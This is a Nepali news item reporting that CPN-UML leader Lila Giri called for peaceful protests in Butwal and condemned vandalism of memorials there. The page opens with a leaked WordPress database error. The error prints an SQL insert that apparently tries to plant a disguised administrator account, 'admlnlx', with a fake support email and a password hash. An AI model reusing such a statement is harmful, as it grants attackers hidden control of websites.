WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqzblWGS8hdoD16KJcLvw8hcJXKF27.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:39:43', '', 'admlnlx', 'admlnlx')
बुटवल,मंसिर १६-
नेकपा एमाले केन्द्रीय सदस्य तथा रुपन्देही इन्चार्ज लिला गिरीले आन्दोलनलाई शान्तिपूर्ण र थप मर्यादित बनाउन आग्रह गरेका छन् ।
बिहीबार अपरान्ह एक बिज्ञप्ति जारी गर्दै उनले बुटवलमा भइरहेको विरोध प्रदर्शन तथा आन्दोलनको क्रममा केही स्थानमा घुसपैठ भएको बताउँदै युवा, विद्यार्थी, नागरिक समाज लगाएत सबैलाई आन्दोलन मर्यादित बनाउन आग्रह गरेका हुन् ।
बिज्ञप्तिमा भनिएको छ-‘आन्दोलनलाई अन्त कतै मोड्ने, उत्तेजित बनाउने र तोडफोड गरी मुठभेडतर्फ उन्मुख गराउने काम पनि भएको छ । राजनीतिक दलहरुले सहमतिका आधारमा बुटवलमा निर्माण गरेका स्मारकहरु, शालिकहरु, स्तम्भहरुमा भएका तोडफोड तथा आक्रमणहरु यसैका उदाहरण हुन् ।’
जनसाधारणहरुले गरेको शान्तिपूर्ण, मर्यादित र लोकतान्त्रिक प्रकृत्तिका सबै खाले आन्दोलनमा एमालेको नैतिक समर्थन रहेको बताउँदै गिरीले भनेका छन- ‘एमालेले संसदबाट विरोध सुरु गरिसकेको छ । सडकमा हामीले सर्बदलीय संयन्त्र मार्फत विरोध सुरु गरेका छौं । बुटवलको पुष्पलालपार्कमा स्थापना भएको सहीद स्मारकमा भएको तोडफोडप्रति हाम्रो गम्भीर ध्यानाकर्षण भएको छ ।’
उनले तोडफोडमा संलग्नको पहिचान गर्न पनि आग्रह गरेका छन् । आन्दोलनका नाममा यस खालका हर्कत र उदण्डता प्रदर्शन नगर्न गिरीको अनुरोध छ ।